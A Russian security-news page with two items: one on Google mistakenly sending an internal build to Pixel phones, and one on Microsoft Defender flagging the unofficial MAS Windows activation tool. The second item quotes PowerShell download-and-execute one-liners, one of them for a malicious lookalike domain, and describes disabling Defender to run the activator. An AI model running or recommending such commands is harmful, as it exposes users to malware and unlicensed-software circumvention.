Google ошибочно отправила внутреннюю сборку пользователям Pixel

Google ошибочно отправила внутреннюю сборку пользователям Pixel

Google ошибочно отправила внутреннюю сборку пользователям Pixel

Google ошибочно отправила внутренний билд в качестве обновления пользователям смартфонов Pixel. Этот билд предназначался для внутреннего использования сотрудниками Google, в распоряжение обычных пользователей он не должен был попасть.

На самом деле, внутренний билд представлял собой предстоящее обновление, которое должно прийти пользователям Pixel в июле. До выхода в паблик сотрудники Google тестируют эти версии на собственном оборудовании.

Такой подход позволяет выявить большинство багов до релиза обновления.

Один из пользователей Pixel заявил, что ему пришло обновление безопасности July 2019 OTA. У юзера был смартфон Pixel 3a XL.

После установки номер сборки изменился на PQ3B.190705.003. От Google в настоящее время не поступало никаких комментариев относительно этого инцидента.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru